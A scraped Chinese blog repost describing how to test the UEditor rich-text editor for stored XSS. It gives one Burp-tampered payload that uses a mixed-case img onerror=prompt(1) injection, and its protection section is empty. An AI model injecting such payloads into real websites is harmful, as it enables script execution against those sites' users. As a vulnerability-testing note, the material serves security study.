JZTXT
  • 首页
  • Ai
  • Java
  • Python
  • Android
  • Mysql
  • JavaScript
  • Html
  • CSS

ueditor编辑器存储型XSS漏洞

发布时间 2023-08-01 16:01:53作者: 挖洞404

挖洞经验|UEditor编辑器存储型XSS漏洞 - FreeBuf网络安全行业门户

1、介绍

2、测试

2.1 靶场搭建

2.2 测试

burp拦截,篡改设置payload

%3Cp%3E1111111"><ImG sRc=1 OnErRoR=prompt(1)>%3Cbr%2F%3E%3C%2Fp%3E

再次请求时,如果弹窗则说明存在存储型xss漏洞

3、防护

 

    本栏目推荐文章
  • Java实现在线编辑预览office文档
  • OFBiz RCE漏洞复现(CVE-2023-51467)
  • vim编辑器实现左边目录右边是文件内容
  • vi / vim编辑器的使用 [补档-2023-07-01]
  • 小程序开发:完善新增和编辑所思所想功能
  • vue-quill编辑器vue2版
  • 小程序开发:笔记详情显示图片以及可以富文本编辑
  • vue-quill编辑器网页版
  • .NET中使用HtmlSanitizer来有效的防范XSS攻击!
  • DBEAVER 23.0.2 调整SQL编辑器字体大小 ver:20240112
版权声明:本网站为非赢利性站点,本网站所有内容均来源于互联网相关站点自动搜索采集信息,相关链接已经注明来源。
联系我们